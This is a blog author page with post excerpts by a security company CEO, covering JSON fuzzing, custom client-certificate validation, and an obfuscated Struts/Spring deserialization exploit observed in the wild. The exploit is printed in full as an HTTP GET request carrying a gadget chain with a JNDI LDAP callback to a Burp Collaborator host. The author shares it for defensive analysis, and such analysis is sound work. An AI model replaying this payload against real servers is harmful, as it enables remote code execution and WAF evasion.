Fuzzing is everything ;) It’s the most useful and resultative hacking technique for sure. At the same time, fuzzing is not just random hitting applications or binaries with some random bytes.

It’s more about ideas, a deep understanding of data formats and application flows, technology stacks, and a lot of other things. It’s more about assumptions on how the particular application was designed and made, than random.

In these series of posts, I wanna share some experience on JSON fuzzing that I’ve achieved for the last 12 years of security audits.

Data types mutations

First of all, JSON is a serialization format, it’s not a string. It means, that you can play with data types even at the parser level. …

I’ve just found some variant of Struts exploit that surprised me by obfuscation technique:

GET /?%01%00java.util.HashMa%f0%01%02%01%01org.springframework.aop.target.HotSwappableTargetSourc%e5%01%01%02%ef%01org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder%01%01%03org.springframework.aop.aspectj.AspectJPointcutAdviso%f2%01%01%04org.springframework.aop.aspectj.AspectJAroundAdvic%e5%01%00%00%00%01%05%cc%01org.springframework.aop.aspectj.annotation.BeanFactoryAspectInstanceFactory%01%00%01%06org.springframework.jndi.support.SimpleJndiBeanFactor%f9%01%01%07org.springframework.jndi.JndiTemplat%e5%01%00%01%08org.apache.commons.logging.impl.NoOpLo%e7%01%01%08%01%01%01%00%01%00%01%09java.util.HashSe%f4%01%01%03%01%c9%03ldap%3a%2f%2fxxxxxxxxxxxxxxxxxxxxxxxxx.burpcollaborator.net%2f%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%01%00%01%00%0e%00%00%01%01%0ajava.lang.Objec%f4%00%00%00%00%00%00%01toStrin%e7%01%01%00%00%00%00%00%00%01%01%03%01%01%01%01%0bcom.sun.org.apache.xpath.internal.objects.XStrin%e7%01%03%01%85%ee%ac%a5%00%17%10%00%01%01%13=1 HTTP/1.1

Do you have any thoughts on what’s it? It seems like Java is avoiding %01 bytes from Unicode sequences, isn’t it?

I’m pretty sure, that the only way to use such kind of comprehensive obfuscation is to bypass signatures for WAFs/IPS/IDS/etc. So, it seems like somebody really knows how to cook bypasses for deserialization exploits at least.

BTW, which Spring vulnerability takes exploits right from the URI? Or this is a new https://nvd.nist.gov/vuln/detail/CVE-2019-9212 Hessian RCE exploited in the wild?

In the first story, I described some issues related to client certificates authentication implementations in environments with load balancers. This time I’d like to mention some typical issues in custom certificate validation processes when a developer is doing this itself in application code.

Let’s formalize the task as a custom authentication based on user certificates. Now, let’s divide this task from the architecture perspective:

  • all the crypto things should be solved by 3-rd party libraries
  • all the business logic should be implemented by yourself
  • PKI library will check the certificate to give you some details about the…


Ivan Novikov

CEO at Wallarm. Application security platform to prevent threats and discover vulnerabilities in a real-time.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store